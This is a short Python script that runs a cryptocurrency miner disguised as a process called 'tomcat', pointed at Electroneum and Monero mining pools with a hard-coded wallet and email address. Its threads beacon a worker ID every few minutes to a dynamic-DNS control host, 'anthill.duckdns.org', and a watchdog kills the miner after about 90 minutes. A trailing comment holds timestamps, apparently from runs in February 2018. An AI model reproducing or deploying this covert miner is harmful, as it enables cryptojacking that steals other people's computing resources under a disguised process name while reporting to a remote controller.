import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:07.043753
#2018-02-17 16:16:01.586778
#2018-02-17 18:02:07.692705
#2018-02-17 19:49:04.478047
#2018-02-17 21:36:07.275684
#2018-02-17 23:20:06.791072
#2018-02-18 01:08:05.177578
#2018-02-18 02:54:07.364999
#2018-02-18 04:43:05.139456
#2018-02-18 06:35:05.738467
#2018-02-18 08:22:07.359756
#2018-02-18 10:10:06.532199
#2018-02-18 11:56:01.515188
#2018-02-18 13:40:08.533947
#2018-02-18 15:31:05.216866
#2018-02-18 17:19:05.376300
#2018-02-18 19:08:06.866649
#2018-02-18 20:54:07.100024
#2018-02-18 22:40:01.583495
#2018-02-19 00:29:01.741002
#2018-02-19 02:13:07.763705
#2018-02-19 04:02:01.364836
#2018-02-19 05:45:08.103619
#2018-02-19 07:32:05.733855
#2018-02-19 09:22:07.254823
#2018-02-19 11:11:06.920470
#2018-02-19 12:58:05.748271
#2018-02-19 14:47:01.395718
#2018-02-19 16:36:05.681344
#2018-02-19 18:22:05.962785
#2018-02-19 20:07:06.799852
#2018-02-19 21:58:05.867881
#2018-02-19 23:43:04.993610
#2018-02-20 01:31:02.011108
#2018-02-20 03:19:04.899094
#2018-02-20 05:06:03.659355
#2018-02-20 06:49:03.879401
#2018-02-20 08:36:01.683275
#2018-02-20 10:20:02.249591
#2018-02-20 12:05:06.778712
#2018-02-20 13:51:12.526995
#2018-02-20 15:36:04.617773
#2018-02-20 17:20:12.221178
#2018-02-20 19:10:11.037145
#2018-02-20 20:59:01.670505
#2018-02-20 22:44:06.620012
#2018-02-21 00:27:07.769651
#2018-02-21 02:15:03.093824
#2018-02-21 04:01:06.490708
#2018-02-21 05:48:01.531956
#2018-02-21 07:36:05.800372
#2018-02-21 09:21:05.752659
#2018-02-21 11:09:01.562792
#2018-02-21 12:56:05.770238
#2018-02-21 14:45:03.416916
#2018-02-21 16:34:07.304557
#2018-02-21 18:25:04.420950
#2018-02-21 20:10:09.955415
#2018-02-21 22:01:02.178787
#2018-02-21 23:48:06.653442
#2018-02-22 01:39:05.335245
#2018-02-22 03:28:04.041018
#2018-02-22 05:15:07.055235
#2018-02-22 06:59:05.213414
#2018-02-22 08:47:05.713260
#2018-02-22 10:35:04.441584
#2018-02-22 12:22:01.736781
#2018-02-22 14:07:10.744520
#2018-02-22 15:55:06.538113
#2018-02-22 17:43:09.299630
#2018-02-22 19:30:03.223654
#2018-02-22 21:22:04.144779
#2018-02-22 23:07:01.839884
#2018-02-23 00:53:06.868946
#2018-02-23 02:40:01.584248
#2018-02-23 04:29:05.436642
#2018-02-23 06:16:06.308158
#2018-02-23 08:02:04.811655
#2018-02-23 10:17:04.980376
#2018-02-23 12:07:08.337331
#2018-02-23 13:54:07.276104
#2018-02-23 15:47:01.896763
#2018-02-23 17:32:05.732346
#2018-02-23 19:18:04.943539
#2018-02-23 21:03:05.473927
#2018-02-23 22:47:05.625382
#2018-02-24 00:34:07.467946
#2018-02-24 02:25:05.570831
#2018-02-24 04:16:03.526178
#2018-02-24 06:03:07.793779
#2018-02-24 07:50:08.931533
#2018-02-24 09:36:05.610835
#2018-02-24 11:29:07.567108
#2018-02-24 13:19:04.576019
#2018-02-24 15:10:02.799770
#2018-02-24 16:58:05.286246
#2018-02-24 18:47:01.713821
#2018-02-24 20:37:01.282308
#2018-02-24 22:42:01.261747
#2018-02-25 01:49:03.751150
#2018-02-25 05:07:04.925288
#2018-02-25 10:18:02.057444